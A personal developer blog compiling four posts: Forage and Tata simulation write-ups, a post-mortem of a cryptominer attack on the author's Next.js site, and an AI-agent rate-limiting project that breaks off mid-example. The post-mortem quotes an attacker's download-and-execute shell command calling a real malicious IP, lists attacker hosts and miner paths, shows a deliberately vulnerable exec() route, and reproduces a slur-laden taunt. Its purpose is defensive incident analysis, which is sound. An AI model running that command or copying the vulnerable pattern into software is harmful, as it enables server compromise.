Task 4: Make It Interactive & Beautiful

Soul Foods wanted to dig into region-specific data. I added:

Radio buttons to filter by region (North, East, South, West, or All)
Custom CSS styling with a modern, clean aesthetic
Responsive design that works on different screen sizes

The callback pattern in Dash made this incredibly smooth—select a region, and the chart updates instantly.

Task 5: Write a Test Suite

Any production-grade codebase needs robust testing. I created tests to verify:

The header is present
The visualization graph is rendered
The region picker is functional

Using pytest with Dash's testing framework, I built recursive component finders that traverse the layout tree. These tests may seem simple, but they protect against regressions as the codebase evolves.
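
A recursive finder of this kind might look like the sketch below. It is not the submitted test code: `Node` is a stand-in class so the example runs without Dash installed, and the ids (`sales-graph`, `region-picker`) are hypothetical. It relies only on components exposing `id` and `children`, where `children` may be missing, a string, a single component, or a list.

```python
class Node:
    """Stand-in for a Dash component: an optional id plus children."""

    def __init__(self, id=None, children=None):
        self.id = id
        self.children = children


def find_by_id(component, target_id):
    """Depth-first search of a layout tree for the component with target_id."""
    if getattr(component, "id", None) == target_id:
        return component
    children = getattr(component, "children", None)
    # Leaf cases: no children at all, or plain text content
    if children is None or isinstance(children, str):
        return None
    # A single child is allowed, so wrap it to keep one code path
    if not isinstance(children, (list, tuple)):
        children = [children]
    for child in children:
        found = find_by_id(child, target_id)
        if found is not None:
            return found
    return None


layout = Node("root", [
    Node("header", "Pink Morsel Sales"),
    Node(children=[Node("sales-graph"), Node("region-picker")]),
])
print(find_by_id(layout, "region-picker").id)
```

A test then reduces to asserting that `find_by_id(layout, "some-id")` is not `None` for each component the layout is expected to contain.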

Task 6: Automate Everything with CI

The final task brought it all together with a bash script for continuous integration:

Automatically activates the virtual environment
Installs dependencies if needed
Runs the full test suite
Returns proper exit codes for CI engines

This is the kind of automation that lets teams ship with confidence.

Why This Challenge Is Cool

1. Progressive Complexity
Each task built naturally on the previous one. By the end, I had context and momentum to make smart architectural decisions.

2. Real-World Messiness
The data had quirks—currency symbols in price fields, inconsistent column names, multiple input files. This forced me to write defensive, production-quality code.

3. End-to-End Ownership
From raw CSVs to a deployed application with tests and CI—I touched every layer of the stack.

4. Practical Business Context
The question "Were sales higher before or after the price increase?" is exactly the kind of question real businesses ask. Building tools to answer it felt meaningful.

5. Modern Stack
Dash + Plotly + Pandas is a legitimate toolchain used in production. The skills transfer directly to real projects.

What I Built

Here's what I delivered:

Deliverable	What It Does
Data Processing Script	Transforms 3 raw CSVs into a clean, analysis-ready dataset
Dash Application	Interactive sales visualizer with region filtering
Visualization Module	Plotly line chart with price-increase annotation
Test Suite	Pytest-based tests verifying core UI components
CI Automation	Bash script for automated testing in CI pipelines

Tech Stack

Python 3.9 — The foundation
Dash — Web framework for data applications
Plotly Express — Interactive, beautiful charts
Pandas — Data manipulation powerhouse
Pytest — Testing framework
Bash — CI automation scripting
CSS — Custom styling for a polished UI
👉 My Submitted Repo
👉 Original Source Code

Key Takeaways

This challenge reinforced critical principles I apply to every project:

Start with clean data: Garbage in, garbage out. Invest in robust ETL.
Let the data speak: Simple visualizations often tell better stories than complex ones.
Build for humans: A pretty UI isn't vanity—it's usability.
Test early, test often: Even simple tests catch real bugs.
Automate the boring stuff: CI scripts save hours of manual work.
Modular architecture wins: Separating data, viz, and web layers made iteration easy.

Try It Yourself

If you'd like to give this challenge a shot:

👉 Quantium Software Engineering Simulation

Then come back and tell me:

How did you style your visualizer?
What patterns did you discover in the data?
Did the sales actually go up or down after the price increase? 😏

Potential Next Steps

The foundation is solid. Here's where this could go:

Enhancement	Description
Additional Filters	Add date range pickers or product type selectors
Statistical Annotations	Show before/after averages directly on the chart
Docker Deployment	Containerize for easy cloud deployment
Database Backend	Replace CSV with a proper data store
Advanced Analytics	Trend lines, forecasting, anomaly detection

Final Thoughts

This project stretched me across roles: data engineer, frontend developer, and DevOps practitioner. But that's the point—real software problems don't come in neat boxes.

I walked away with a working application, clean architecture, and practical experience with a modern data visualization stack. That's the kind of outcome I aim for in every project.

The answer to Soul Foods's question? Run the app yourself and find out. The data doesn't lie. 📊

How I Tackled GenAI-Powered Data Analytics (And Unlocked a New Perspective on AI Strategy)

Luis Faria — Thu, 18 Dec 2025 02:59:27 +0000

After completing the Commonwealth Bank Software Engineering Challenge and my AWS Solutions Architect journey, I was hungry for the next one. That's when I discovered Tata's GenAI Powered Data Analytics simulation on Forage.

As a master's-degree hustler who enjoys stacking tough problems, I figured this would sharpen my edge in AI strategy. Spoiler: it was SO much more than that.

"Comfort is the enemy. Keep moving."

Here's my story of how I tackled a real consulting scenario—predicting delinquency risk, designing ethical AI systems, and building an end-to-end GenAI-powered analytics solution.

Want to jump in yourself? Check out the simulation here before reading. SPOILER ALERT ahead!

The Scenario: AI Transformation Consultant

The simulation places you in the role of an AI transformation consultant working with Geldium Finance's collections team. Here's the brief:

Client: Geldium Finance

Problem: High delinquency rates, inefficient collections, no AI strategy

Goal: Design a GenAI-powered analytics solution for predicting delinquency risk and building an ethical, scalable collections strategy

This wasn't just another theoretical exercise. This was about impact.

The Challenge: Three Interconnected Problems

What I loved about this simulation was that it wasn't compartmentalized. Each task built on the previous one, mirroring how real consulting actually works.

Task 1: Exploratory Data Analysis (EDA) with GenAI

The first task dropped a real dataset on my desk: customer financial data with delinquency flags. My job? Conduct an EDA using GenAI tools to assess data quality, identify risk indicators, and structure insights for predictive modeling.

Instead of spending hours staring at correlation matrices, I used GenAI as a thinking partner—Claude and ChatGPT helped me structure hypotheses, identify outliers, and surface patterns I might have missed. Pure momentum.

The mindset shift: GenAI isn't about replacing analysis—it's about amplifying insight generation at scale.

Task 2: Designing a Predictive Modeling Framework

With EDA insights in hand, Task 2 asked me to design an initial no-code predictive modeling framework to assess customer delinquency risk.

No-code. That's the kicker. In the traditional ML world, we jump straight to scikit-learn and TensorFlow. But Tata's simulation forced me to think about business feasibility, scalability, and explainability before touching a single line of code.

I proposed a structured framework that leveraged GenAI to:

Define logic for risk scoring without complex algorithms
Create transparent, auditable decision pathways
Generate evaluation criteria that align with business goals
Design for regulatory compliance from day one

This exercise taught me something crucial: the best models are often the ones non-technical stakeholders actually understand and trust.
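
The framework itself was no-code, but the idea of transparent, auditable scoring can be illustrated in a few lines of Python. Everything specific here is hypothetical: the feature names, thresholds, point values, and band cut-offs are invented for the example and are not taken from the simulation or from my deliverable.

```python
# Each rule: (plain-language description, predicate, points). All values are illustrative.
RULES = [
    ("2+ missed payments in the last 6 months", lambda c: c["missed_payments"] >= 2, 40),
    ("credit utilization above 80%", lambda c: c["credit_utilization"] > 0.80, 30),
    ("debt-to-income ratio above 45%", lambda c: c["debt_to_income"] > 0.45, 20),
]


def score_customer(customer):
    """Return (score, reasons) so every point traces back to a named rule."""
    reasons = [(desc, points) for desc, applies, points in RULES if applies(customer)]
    score = sum(points for _, points in reasons)
    return score, reasons


def risk_band(score):
    """Map a score to a band using hypothetical cut-offs."""
    if score >= 60:
        return "high"
    if score >= 30:
        return "medium"
    return "low"


customer = {"missed_payments": 3, "credit_utilization": 0.85, "debt_to_income": 0.30}
score, reasons = score_customer(customer)
print(score, risk_band(score), reasons)
```

Because each triggered rule is returned alongside the score, a reviewer or regulator can see exactly why a customer landed in a given band, which is the explainability property the framework was designed around.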

Task 3: Architecting an AI-Driven Collections Strategy

The final challenge was the juicy one. Design a comprehensive collections strategy that:

Leveraged agentic AI (AI agents that can take autonomous actions)
Incorporated ethical AI principles and fairness considerations
Met regulatory compliance requirements
Scaled across thousands of customers

I spent time thinking about:

How do you design AI automation that reduces bias rather than amplifies it?
What does a scalable implementation framework actually look like?
How do you balance aggressive collections efforts with customer empathy?

The answer wasn't a 200-page architecture document. It was a thoughtful, actionable strategy that balanced business needs with ethical responsibilities.

Why This Challenge Hits Different

Unlike cookie-cutter tutorials, this simulation felt alive. Here's why:

1. Real-World Messiness
The data wasn't clean. The requirements weren't perfectly aligned. The business constraints were genuinely contradictory at times. This forced me to make trade-offs and justify decisions—just like in actual work.

2. GenAI Integration (Not AI Replacement)
Rather than asking "how do I build an AI solution?" it asked "how do I use AI tools to solve a business problem?" That's a fundamentally different question, and way more interesting.

3. Ethical Complexity
Collections is a sensitive business. The simulation didn't shy away from fairness, bias, and regulatory concerns. It forced me to think about impact beyond accuracy metrics.

4. Progressive Scaffolding
Each task built naturally on the previous one. By Task 3, I had context and data to make informed architectural decisions. It didn't feel like disconnected modules—it felt like a real consulting engagement.

5. Forage's Presentation
The simulation was polished, professional, and genuinely engaging. The client emails felt real. The scenarios were plausible. This elevated the whole experience from "training exercise" to "legitimate portfolio piece."

What I Built

Here's what I delivered:

Deliverable	What It Does
EDA Summary Report	Data quality assessment, risk indicator identification, structured insights
Predictive Modeling Framework	No-code risk scoring logic with transparent decision pathways
Collections Strategy	Ethical AI architecture with implementation roadmap and regulatory alignment
Streamlit Application	Interactive dashboard for EDA and model planning

Tech Stack

Python + Pandas for data wrangling
Streamlit for the interactive dashboard
GenAI (Claude/ChatGPT/Grok) as thinking partners throughout
Markdown for structured documentation

👉 Open Source Code (GitHub)

Key Takeaways

This challenge reinforced critical principles I apply to every project:

Start with the business problem: Every model decision should trace back to impact
GenAI amplifies, doesn't replace: Use it as a thinking partner, not a crutch
Explainability > Complexity: The best models are ones stakeholders trust
Ethics aren't optional: Fairness and compliance must be baked in from day one
Ship something real: I didn't just write reports—I built a working Streamlit app

Try It Yourself

Again, if you'd like to give this challenge a shot:

👉 Tata GenAI Data Analytics Simulation

Then come back and tell me:

What surprised you most?
How did your approach to analysis shift?
What ethical dilemmas did you wrestle with?

I genuinely want to hear your takes. The beauty of challenges like this is there's no single right answer—just thoughtful problem-solving.

Potential Next Steps

The foundation is solid. Here's where this could go:

Enhancement	Description
Advanced Visualizations	More sophisticated Streamlit dashboards
ML Model Implementation	Validate the no-code framework with actual models
Ethical AI Documentation	Lessons learned in bias mitigation
Prompting Strategies	Deep dive into GenAI techniques that worked

Final Thoughts

This project stretched me across roles: data analyst, ML strategist, consultant, and engineer. But that's the point—real problems don't come in neat boxes.

I walked away with a working application, solid documentation, and a sharper perspective on how GenAI fits into enterprise analytics. That's the kind of outcome I bring to every engagement.

Go give it a shot. I'll be watching for your takes in the comments. 🚀

Security Incident Report: Cryptominer Attack on Next.js Application

Luis Faria — Sat, 13 Dec 2025 04:46:57 +0000

Introduction

On December 7-8, 2025, my Next.js portfolio application, luisfaria.dev, running on a DigitalOcean Ubuntu droplet, was compromised by an automated cryptomining attack. The attacker successfully executed remote code on the containerized Next.js application, deploying cryptocurrency miners that ran for several hours before detection.

This document serves as a post-mortem analysis and educational resource for understanding how the attack occurred, what was compromised, and how to prevent similar incidents.

Timeline:

Attack Started: ~December 7, 21:52 UTC
Detection: December 8, ~18:00 UTC (via unusual container behavior)
Remediation: December 9, 2025 (full rebuild and investigation)
Posting: December 10, 2025 (this document)

Problem Outline

What Happened

An attacker exploited a vulnerability in my Next.js application to execute arbitrary shell commands within the Docker container. The attack resulted in:

Cryptominer deployment - Two mining processes (XXaFNLHK and runnv) running for 4+ hours
Resource exhaustion - CPU usage spiked, causing application timeouts
Persistence attempts - Malware tried (and failed) to create systemd services
Process spawning - 40+ zombie shell processes created to maintain infection

Initial Symptoms

Nginx timeouts: Multiple upstream timed out (110: Operation timed out) errors
Container unresponsiveness: All docker commands became extremely slow
HTTP 499/504 errors: Requests failing or timing out
High CPU usage: Container consuming excessive resources

Discovery

docker compose exec webapp ps aux

Revealed:

PID   USER     TIME  COMMAND
1126  nextjs   4h24  ./XXaFNLHK          # Cryptominer #1
1456  nextjs   3h49  /tmp/runnv/runnv    # Cryptominer #2
40+   nextjs   0:00  [sh]                # Zombie shells

Findings

1. Attack Vector: Remote Code Execution (RCE)

The attacker exploited a vulnerability that allowed execution of shell commands through HTTP requests. The exact entry point was identified through nginx access logs showing suspicious POST requests with URL-encoded shell commands.

Evidence from logs:

141.98.11.98 - POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20jew.arm7%3B%20wget%20http%3A%2F%2F78.142.18.92%2Fbins%2Fjew.arm7%3B%20chmod%20777%20jew.arm7%3B%20.%2Fjew.arm7%20tbk

Decoded command:

cd /tmp; rm jew.arm7; wget http://78.142.18.92/bins/jew.arm7; chmod 777 jew.arm7; ./jew.arm7 tbk
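
The decoding step above can be reproduced when triaging other log lines. This is a minimal sketch, assuming the request path has already been pulled out of the nginx access log; `decodeQueryParam` and `looksLikeShellInjection` are hypothetical helper names, and the regular expression is a crude heuristic rather than a complete detector.

```typescript
// Extract one query parameter from a logged request path and URL-decode it.
// Hypothetical helper for log triage; not part of the original application.
function decodeQueryParam(requestPath: string, name: string): string | null {
  const queryStart = requestPath.indexOf("?");
  if (queryStart === -1) return null;

  for (const pair of requestPath.slice(queryStart + 1).split("&")) {
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    if (key !== name) continue;

    const raw = eq === -1 ? "" : pair.slice(eq + 1);
    try {
      return decodeURIComponent(raw);
    } catch {
      return raw; // malformed percent-escapes: keep the raw value for manual review
    }
  }
  return null;
}

// Crude heuristic: shell separators or download/permission tools in a parameter value.
function looksLikeShellInjection(value: string): boolean {
  return /[;|`]|\$\(|\b(wget|curl|chmod)\b/.test(value);
}

// Request path copied from the log evidence above.
const loggedPath =
  "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20jew.arm7%3B%20wget%20http%3A%2F%2F78.142.18.92%2Fbins%2Fjew.arm7%3B%20chmod%20777%20jew.arm7%3B%20.%2Fjew.arm7%20tbk";

const decoded = decodeQueryParam(loggedPath, "mdc");
console.log(decoded);
console.log(decoded !== null && looksLikeShellInjection(decoded));
```

Running every query parameter of suspicious requests through a check like this makes it easier to separate generic internet noise from requests that carry an actual payload.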

This is a common IoT/router exploit being sprayed at internet-facing servers. The fact that my Next.js application responded to this indicates a code execution vulnerability.

2. Malware Analysis

Downloaded files:

/tmp/runnv/runnv           # 8.3MB binary - cryptominer
/tmp/runnv/config.json     # Mining pool configuration
/tmp/alive.service         # Systemd persistence attempt (failed)
/tmp/lived.service         # Systemd persistence attempt (failed)
./XXaFNLHK                 # Secondary miner binary

Attacker infrastructure:

89.144.31.18 - Download server for initial payload (x86 binary)
78.142.18.92 - Secondary malware distribution server

3. Next.js Application Vulnerability

Key findings from application logs:

⨯ [Error: NEXT_REDIRECT] {
  digest: '12334\nmy nuts itch nigga\nMEOWWWWWWWWW'
}

This custom "digest" value in NEXT_REDIRECT errors strongly suggests:

An API route or Server Action is executing unsanitized user input
The attacker is injecting shell commands through HTTP parameters
Next.js is catching the error but the command has already executed

Probable vulnerable code pattern:

// VULNERABLE CODE - Example of what might exist
export async function POST(request) {
  const { command } = await request.json();
  const { exec } = require('child_process');
  exec(command); // 🚨 DANGEROUS - executes arbitrary commands
  return Response.json({ success: true });
}

4. Attack Pattern

Reconnaissance: Automated bots scan for vulnerable servers
Exploitation: Send crafted HTTP requests with shell commands
Payload delivery: Download cryptominer binaries from attacker's server
Execution: Run miners using victim's CPU resources
Persistence: Attempt to create startup services (blocked by Docker permissions)
Obfuscation: Spawn multiple shell processes to avoid detection

5. Why Docker Sandboxing Helped

The attack was partially contained due to Docker security:

✅ What Docker prevented:

Miners couldn't write to /dev/ (Permission denied)
Systemd services couldn't be installed (no systemd in container)
Limited filesystem access
Isolated from host system

❌ What Docker didn't prevent:

Code execution within container
CPU resource consumption
Network connections to mining pools
Writing to /tmp/ directory

Solution

Immediate Actions Taken

# 1. Preserve forensic evidence first (docker compose down removes the containers and their logs)
docker logs frontend_app > ~/attack_logs.txt 2>&1
docker logs nginx_gateway > ~/nginx_logs.txt 2>&1

# 2. Stop and remove the compromised containers
docker compose down

# 3. Full rebuild from clean source
cd /var/www/portfolio
git pull origin master --ff-only
docker compose build --no-cache
docker compose up -d

# 4. Verify clean state
docker compose ps
docker compose exec webapp ps aux  # Check for suspicious processes

Required Code Review

Action items:

✅ Audit all API routes for exec(), spawn(), eval(), or Function() calls
✅ Review Server Actions for input validation
✅ Check dependencies for known vulnerabilities: npm audit
✅ Update Next.js to latest version (was on 15.3.2)
✅ Implement input sanitization on all user-facing endpoints

Search for vulnerable patterns:

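# Find dangerous functions in codebase (including .jsx/.tsx components)
grep -rnE "exec|spawn|eval|Function\(" . \
  --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" \
  --exclude-dir=node_modules --exclude-dir=.next

# List Server Action files so each one can be reviewed for input validation
grep -rn "use server" . \
  --include="*.js" --include="*.jsx" --include="*.ts" --include="*.tsx" \
  --exclude-dir=node_modules --exclude-dir=.next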

Security Hardening Implementation Plan

1. Docker Security

# Dockerfile: run as non-root user (already implemented)
USER nextjs

# docker-compose.yml: limit resources (nested under the service definition)
deploy:
  resources:
    limits:
      cpus: '1.0'
      memory: 512M

→ ✅ Issue #34 - docker-compose: add CPU and memory resource limits for backend & frontend

2. Network Security

# docker-compose.yml - Add network isolation
networks:
  frontend:
    driver: bridge
  backend:
    driver: bridge
    internal: true  # No internet access for backend

→ 🔥 Issue #40 - docker-compose: add network isolation between frontend and backend containers

3. Nginx Rate Limiting

# Prevent automated attacks (limit_req_zone must be declared in the http block)
limit_req_zone $binary_remote_addr zone=api:10m rate=10r/s;

location /api/ {
    limit_req zone=api burst=20 nodelay;
}

→ 🔥 Issue #33 - nginx: add security headers, rate limiting, and request size limit

4. Input Validation (Critical)

// SECURE CODE - Never execute user input directly
import { z } from 'zod';

// Define strict schema
const schema = z.object({
  action: z.enum(['allowed', 'actions', 'only']),
  value: z.string().max(100).regex(/^[a-zA-Z0-9]+$/)
});

export async function POST(request) {
  const body = await request.json();

  // Validate input
  const result = schema.safeParse(body);
  if (!result.success) {
    return Response.json({ error: 'Invalid input' }, { status: 400 });
  }

  // Never use exec/spawn with user input
  // Use safe alternatives or predefined operations keyed by the validated action
  return Response.json({ success: true, action: result.data.action });
}

→ ✅ Issue #29 - backend: enhance chatbot input validation for shell/metacharacters

5. Monitoring & Alerting

# Set up container resource monitoring
docker stats frontend_app

# Alert on high CPU usage
# (Implement monitoring solution like Prometheus, Grafana, etc.)

→ 🔥 Issue #39 - monitoring: set up container resource monitoring and alerts

6. CORS restrictions

Production CORS in backend/src/index.ts currently restricts origins to http://localhost:3000.

Update the following in backend/src/index.ts:

const corsOptions = {
  origin: config.nodeEnv === 'production' 
    ? ['https://luisfaria.dev'] // ✅ add production domain
    : 'http://localhost:3000',
  credentials: true
};

→ ✅ Issue #32 - backend: fix CORS configuration for production

Final Tips

Prevention Checklist

[X] Never execute user input directly - This is the #1 rule
[X] Input validation - Use strict schemas (Zod, Joi, etc.)
[X] Dependency updates - Run npm audit regularly (frontend and backend)
[X] Least privilege - Run containers as non-root users (Dockerfile: USER nextjs)
[X] Resource limits - Prevent resource exhaustion (Issue #34)
[X] Regular security audits - Review code for vulnerabilities
[X] Keep Next.js updated - Security patches are released regularly
[ ] Rate limiting - Prevent brute force attacks (Issue #33)
[ ] Network isolation - Limit container internet access (Issue #40)
[ ] Logging & monitoring - Detect anomalies early (Issue #35)

Red Flags to Watch For

🚩 Unexpected CPU spikes
🚩 Unusual network connections
🚩 Slow container response times
🚩 Multiple timeout errors in logs
🚩 Unknown processes in ps aux
🚩 Files in /tmp/ you didn't create
🚩 Suspicious POST requests in access logs
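
Two of these red flags (unknown processes and binaries running from /tmp/) can be checked automatically. The following is a minimal sketch, assuming the simplified four-column `ps` output shown in the Discovery section; `parsePs`, `isSuspicious`, the allowlist, and the `node server.js` row are hypothetical and only illustrate the idea.

```typescript
interface ProcessRow {
  pid: number;
  user: string;
  time: string;
  command: string;
}

// Parse simplified `ps` output with columns: PID USER TIME COMMAND.
function parsePs(output: string): ProcessRow[] {
  const rows: ProcessRow[] = [];
  for (const line of output.split("\n")) {
    const match = /^\s*(\d+)\s+(\S+)\s+(\S+)\s+(.+)$/.exec(line);
    if (match === null) continue; // header, blank line, or unparseable row
    rows.push({
      pid: Number(match[1]),
      user: match[2],
      time: match[3],
      command: match[4].trim(),
    });
  }
  return rows;
}

// Flag anything launched from /tmp or a relative path, or not on the allowlist.
function isSuspicious(row: ProcessRow, allowedExecutables: string[]): boolean {
  const executable = row.command.split(/\s+/)[0];
  const runsFromTmp = executable.indexOf("/tmp/") === 0;
  const runsFromCwd = executable.indexOf("./") === 0;
  return runsFromTmp || runsFromCwd || allowedExecutables.indexOf(executable) === -1;
}

const psOutput = [
  "PID   USER     TIME  COMMAND",
  "1     nextjs   0:12  node server.js", // hypothetical legitimate process
  "1126  nextjs   4h24  ./XXaFNLHK",
  "1456  nextjs   3h49  /tmp/runnv/runnv",
].join("\n");

// Flags the two miner processes (PIDs 1126 and 1456) and leaves the node process alone.
const flagged = parsePs(psOutput).filter((row) => isSuspicious(row, ["node"]));
console.log(flagged.map((row) => row.pid));
```

An allowlist is stricter than a blocklist here: the miner binaries had random names, so matching on known-bad names would not have caught them.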

Key Takeaways

Never trust user input - Always validate and sanitize
Defense in depth - Multiple security layers (Docker, nginx, app-level)
Monitor everything - Logs saved my ass in this incident
Automate security - CI/CD with automated security scanning
Stay updated - Regular dependency and framework updates

Conclusion

This incident was a valuable learning experience demonstrating how quickly automated attacks can compromise vulnerable applications. The attack was detected relatively quickly due to visible performance degradation, and Docker's sandboxing prevented host-level compromise.

The attacker's crude taunt in the NEXT_REDIRECT digest served as an inadvertent calling card, making the attack logs memorable (🤣) and providing a clear marker during the investigation.

The primary lesson: Never execute unsanitized user input. This single vulnerability can turn your server into someone else's cryptocurrency mining rig.

Status: ✅ Incident resolved, system rebuilt, monitoring enhanced, awaiting code audit completion.

Building IRL: From a $50k AWS Horror Story to Human-Centered AI Governance

Luis Faria — Tue, 09 Dec 2025 03:33:08 +0000

From runaway agents to responsible governance—how I turned academic research into a production-ready rate limiting system.

"The design choices we make today will determine whether autonomous AI amplifies human capability—or undermines it."

The Origin Story: Why I Built This

What happens when you give an AI agent your credit card and tell it to "solve this problem autonomously"?

For one developer, it meant waking up to a $50,000 AWS bill.

That's not a hypothetical horror story. It's a real incident I documented during my research—and it's the reason I spent the last trimester building the Intelligent Rate Limiting (IRL) System at Torrens University Australia under Dr. Omid Haas in the Human-Centered Design (HCD402) subject.

But here's the thing: rate limiting isn't just a technical problem. It's a human problem.

Can we build governance systems that talk with developers, not at them?

Figure 1: Google Trends Interest over time on "ai agent" (Jan 2023 – Oct 2025). Source: Google Trends

That question drove the entire project.

🤖 What Is IRL?

IRL (Intelligent Rate Limiting) is a middleware layer for autonomous AI agents that provides:

Visibility: Real-time dashboard of quotas, carbon footprint, and cost projections
Feedback: Contrastive explanations—why blocked + how to succeed
Fairness: Weighted allocation so students and startups aren't crushed by enterprise defaults
Accountability: Immutable audit logs with hashed entries for every decision
Sustainability: Carbon-aware throttling that defers non-urgent work during high-emission windows

Traditional rate limiters say HTTP 429 Too Many Requests. IRL says:

Request #547 blocked – exceeds daily energy threshold.
Current: 847 kWh / Limit: 850 kWh.
Reset in 25 minutes.

Options:
→ Request override (2 escalations remaining)
→ Schedule for low-carbon window (4:00 AM)
→ Reduce task priority to continue at lower quota

That's the difference between a wall and a coach.

Figure 2: Conceptual flow of the Intelligent Rate-Limiting System – from agent request to governed response.

The 12-Week Journey

The subject covered 12 weeks across three progressive assessments:

Week	Assessment	Focus
Weeks 1-4	Assessment 1	AI Recommendation Systems & Transparency Crisis
Weeks 5-8	Assessment 2	Agentic AI Failure Modes & Problem Space
Weeks 9-12	Assessment 3	IRL System Design & Implementation

Each assessment wasn't a random task—they naturally built toward the final system.

Assessment 1: The Spark (Research Presentation)

Outcome: Understanding how opaque AI erodes user agency

My journey into AI governance started innocently enough with a research presentation on AI recommendation systems. I explored how platforms like Netflix and Spotify shape our choices—but also how they can trap us in filter bubbles.

The Challenge: Deliver a 10-minute presentation analyzing the evolution of a technology through a human-centered lens.

Why It Matters: When AI systems lack transparency and human oversight, they undermine user agency. This seeded IRL's Visibility pillar—the idea that users deserve to see what their AI is doing.

💡 Key Insight: Opaque systems erode trust. If users can't understand why a decision was made, they can't meaningfully consent to it.

Figure 3: The Paradox of Technology – Convenience vs Complexity. As AI systems become more capable, the gap between user understanding and system behavior widens.

📊 VIEW PRESENTATION

Assessment 2: Identifying the Problem (2000-word Report)

Outcome: Documenting the Agentic AI Crisis

For my second assessment, I dove deep into the emerging world of Agentic AI—autonomous agents like AutoGPT, Devin, and GPT-Engineer that don't wait for commands and act independently.

The Challenge: Write a 2000-word report identifying a human-centered problem in emerging technology and proposing a solution framework.

The 2000-word report uncovered four critical failure modes:

Failure Mode	Evidence	Impact
Technical	Cascading API failures, infinite retry loops	$15k-$50k overnight bills
Environmental	Continuous workloads with zero carbon awareness	800kg CO₂/month per deployment
Human	47,000+ Stack Overflow questions on opaque throttling	Developer confusion & frustration
Ethical	Accountability diffusion	"The algorithm did it" as excuse

Current solutions? Generic HTTP 429 errors with zero context, zero fairness, and zero human control.

💡 Key Insight: I traced one overnight spike to an autonomous agent retrying a failing call 11,000 times. The legacy stack said nothing but 429. That failure pattern shaped IRL's contrastive feedback model.

Figure 4: Google Trends Related Topics and Queries – showing the explosion of interest in AI agents and related technologies.

Figure 5: HCD Gaps in Agentic AI – These complications set the stage for the immediate undermining effects where technical success collided with social and ethical fragility.

Why It Matters: This assessment defined the problem space—the gap between what developers need (context, fairness, control) and what they get (a wall).

📄 READ FULL REPORT

Assessment 3: Building the Solution (System Design + Presentation)

Outcome: IRL System Design & Implementation

The natural progression: Design and build a human-centered governance system.

Working with teammates Julio and Tamara, we created the Intelligent Multi-Tier Rate-Limiting System—a 3500-word technical specification, a 12-minute presentation, and most importantly, a production-ready implementation.

The Challenge: Design a complete system solution addressing the problem from A2, with technical architecture, HCD principles, and implementation plan.

Why It Matters: This wasn't just a paper exercise. We shipped code. We ran benchmarks. We validated the five HCD pillars against real scenarios.

Figure 6: Early sketching of the proposed Intelligent Rate Limiting System – from whiteboard to architecture.

📘 SYSTEM DESIGN REPORT | 📊 PRESENTATION

Project Timeline & Results

Month	Assessment	Status
October 2025	AI Recommendation Systems	86% (HD)
November 2025	Agentic AI Problem Report	84% (D)
December 2025	IRL System Design	72.5% (C)

Total Duration: 12 weeks of intensive human-centered design for AI governance

Technical Architecture

Layer	Technology	Purpose
Runtime	Node.js + TypeScript	Async-first for concurrent agents
API	GraphQL + Apollo Server	Flexible queries, real-time subscriptions
State	Redis	Distributed token buckets, sub-ms latency
Carbon Data	Green Software Foundation SDK	Real-time grid intensity
Deployment	Docker + Kubernetes	Horizontal scaling across regions
Version Control	Git + GitHub	Full project history

Why This Stack?

Academic projects offer a unique advantage: you can optimize for learning AND production-readiness simultaneously.

Redis: Atomic operations prevent race conditions (powers Twitter, GitHub, StackOverflow)
GraphQL: Single endpoint, real-time subscriptions for dashboard updates
TypeScript: Type safety prevents production bugs in complex async workflows
Kubernetes: Auto-scaling handles traffic spikes without manual intervention

I containerized everything because the IRL stack is designed to scale horizontally across nodes—essential for enterprise deployments.
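
To make the "distributed token buckets" idea concrete, here is a minimal single-process sketch of the token bucket technique. It is an assumption-laden illustration, not the IRL implementation: it keeps state in memory instead of Redis, the class and parameter names are hypothetical, and a real distributed version would need the refill-and-consume step to run atomically on the Redis side.

```typescript
interface Bucket {
  tokens: number;
  lastRefillMs: number;
}

// In-memory token bucket, one bucket per agent ID (hypothetical names throughout).
class TokenBucketLimiter {
  private buckets: Record<string, Bucket> = {};

  constructor(private capacity: number, private refillPerSecond: number) {}

  // Returns true if the agent may proceed; consumes one token when it does.
  tryConsume(agentId: string, nowMs: number): boolean {
    const existing = this.buckets[agentId];
    const bucket: Bucket = existing !== undefined
      ? existing
      : { tokens: this.capacity, lastRefillMs: nowMs };

    // Refill in proportion to elapsed time, capped at capacity.
    const elapsedSeconds = Math.max(0, nowMs - bucket.lastRefillMs) / 1000;
    bucket.tokens = Math.min(this.capacity, bucket.tokens + elapsedSeconds * this.refillPerSecond);
    bucket.lastRefillMs = nowMs;
    this.buckets[agentId] = bucket;

    if (bucket.tokens < 1) return false;
    bucket.tokens -= 1;
    return true;
  }
}

// Capacity of 2 requests, refilling 1 token per second.
const limiter = new TokenBucketLimiter(2, 1);
const results = [
  limiter.tryConsume("agent-a", 0),    // allowed
  limiter.tryConsume("agent-a", 0),    // allowed
  limiter.tryConsume("agent-a", 0),    // throttled: bucket empty
  limiter.tryConsume("agent-a", 1000), // allowed: one token refilled after 1 s
];
console.log(results);
```

Passing the clock in as `nowMs` keeps the sketch deterministic and easy to test; a production limiter would read the time from a shared source so all instances agree.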

Figure 7: Architecture overview of the Intelligent Multi-Tier Rate-Limiting System – showing the middleware layer between agentic workloads and backend APIs.

Figure 8: The IRL GraphQL schema acts as a clear contract, providing clients with a complete understanding of the API's capabilities. This schema enables real-time monitoring (subscriptions), user self-service (queries), and oversight workflows (mutations).

🗝️ The 5 HCD Pillars (Story + Receipts)

Traditional rate limiters are constraints. IRL is a collaborative dialogue.

Traditional Rate Limiter	IRL System
❌ HTTP 429 (no context)	✅ Contrastive explanation with alternatives
❌ Flat rate limits	✅ Weighted Fair Queuing (equity > equality)
❌ Black box decisions	✅ Real-time dashboard + audit logs
❌ Cost-blind	✅ Carbon-aware + financial projections
❌ Developer vs. system	✅ Collaborative governance

1. Visibility – See What Your AI Is Doing

Real-time dashboard showing:

Request counts and quota consumption
Projected costs (financial + carbon)
When limits will reset
Historical trends and anomaly detection

The story: This is how we caught the $50k spike while it was still forming. No more black boxes.

Figure 9: The IRL Monitoring Dashboard – real-time visibility into agent quotas, carbon footprint, and cost projections.

2. Feedback – Understand Why You're Being Throttled

Traditional rate limiter:

HTTP 429 Too Many Requests
Retry-After: 3600

IRL System:

{
  "status": "throttled",
  "reason": "Daily energy threshold exceeded",
